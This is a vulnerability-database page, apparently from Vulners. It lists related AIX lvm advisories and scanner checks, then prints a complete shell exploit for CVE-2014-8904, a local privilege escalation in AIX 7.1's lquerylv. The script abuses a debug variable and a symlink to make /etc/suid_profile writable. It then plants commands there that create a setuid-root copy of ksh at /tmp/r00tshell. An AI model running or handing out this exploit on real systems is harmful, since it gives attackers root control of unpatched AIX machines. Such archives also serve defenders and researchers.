| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| AIX 7.1 - lquerylv Local Privilege Escalation Vulnerability | 30 Oct 201500:00 | – | zdt | |
| AIX 6.1 TL 9 : lvm (IV67907) | 2 Feb 201500:00 | – | nessus | |
| AIX 7.1 TL 3 : lvm (IV67908) | 14 Jan 201500:00 | – | nessus | |
| AIX 5.3 TL 12 : lvm (IV68070) | 14 Jan 201500:00 | – | nessus | |
| AIX 6.1 TL 8 : lvm (IV68082) | 14 Jan 201500:00 | – | nessus | |
| AIX 6.1 TL 9 : lvm (IV68099) (deprecated) | 14 Jan 201500:00 | – | nessus | |
| AIX 7.1 TL 2 : lvm (IV68478) | 14 Jan 201500:00 | – | nessus | |
| AIX 7.1 TL 3 : bos.rte.lvm (U865854) | 29 May 201500:00 | – | nessus | |
| AIX 6.1 TL 9 : bos.rte.lvm (U865862) | 29 May 201500:00 | – | nessus | |
| AIX 7.1 TL 2 : bos.rte.lvm (U867549) | 30 Sep 201500:00 | – | nessus |
#!/bin/sh
#
# Exploit Title: AIX 7.1 lquerylv privilege escalation
# Date: 2015.10.30
# Exploit Author: S2 Crew [Hungary]
# Vendor Homepage: www.ibm.com
# Software Link: -
# Version: -
# Tested on: AIX 7.1 (7100-02-03-1334)
# CVE : CVE-2014-8904
#
# From file writing to command execution ;)
#
export _DBGCMD_LQUERYLV=1
umask 0
ln -s /etc/suid_profile /tmp/DEBUGCMD
/usr/sbin/lquerylv
cat << EOF >/etc/suid_profile
cp /bin/ksh /tmp/r00tshell
/usr/bin/syscall setreuid 0 0
chown root:system /tmp/r00tshell
chmod 6755 /tmp/r00tshell
EOF
/opt/IBMinvscout/bin/invscoutClient_VPD_Survey # suid_profile because uid!=euid
/tmp/r00tshellData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation